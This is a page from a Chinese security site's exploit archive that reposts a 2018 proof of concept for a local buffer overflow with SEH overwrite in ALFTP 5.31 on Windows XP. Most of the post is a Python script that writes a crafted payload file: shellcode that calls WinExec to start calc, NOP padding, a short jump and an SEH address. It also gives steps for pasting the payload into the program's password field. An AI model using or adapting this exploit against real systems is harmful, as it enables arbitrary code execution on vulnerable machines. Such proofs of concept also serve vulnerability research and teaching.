首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 ALFTP 5.31 - Local Buffer Overflow (SEH Bypass) 来源：vfocus.net 作者：Babu 发布时间：2018-05-29   # Exploit Title: ALFTP 5.31 - Local Buffer Overflow (SEH Bypass)        # Exploit Author: Gokul Babu                  # Vendor Homepage: http://www.altools.com/downloads/alftp.aspx                    # Vulnerable Software: http://advert.estsoft.com/?event=201001127730323               # Tested on: Windows XP Professional SP3 -Version-2002                    # Steps to reproduce-1: (eip overwrite-88-windows-XP) # Paste the contents of alftp.txt in 'options->Preference->Security->New password &Confirm password'   #seh- 0041A6EF "\xEF\xA6\x41" #address to jump 0012FA7A #nseh- "\xEB\xAC\x90\x90" #winexec address 0x7c862aed   #!/usr/bin/python   shellcode=("\x33\xC0" "\x50" "\x68\x63\x61\x6C\x63" "\x8B\xC4" "\x50" "\xE8\x61\x30\x73\x7C")   buf="\x90"*4 + shellcode + "\x90"*(80-len(shellcode)) + "\xEB\xAC\x90\x90" + "\xEF\xA6\x41"   f=open("alftp.txt","w") f.write(buf) f.close()   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·CloudMe Sync < 1.11.0 - Buffer ·GNU Barcode 0.99 - Buffer Over ·Bitmain Antminer D3/L3+/S9 - R ·GNU Barcode 0.99 - Memory Leak ·D-Link DSL-2750B - OS Command ·Siemens SIMATIC S7-300 CPU - R ·Skia and Firefox - Integer Ove ·Procps-ng - Multiple Vulnerabi ·Microsoft Edge Chakra - Cross ·Sony Playstation 4 (PS4) 5.1 - ·SAP Internet Transaction Serve ·Microsoft Edge Chakra - EntryS   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved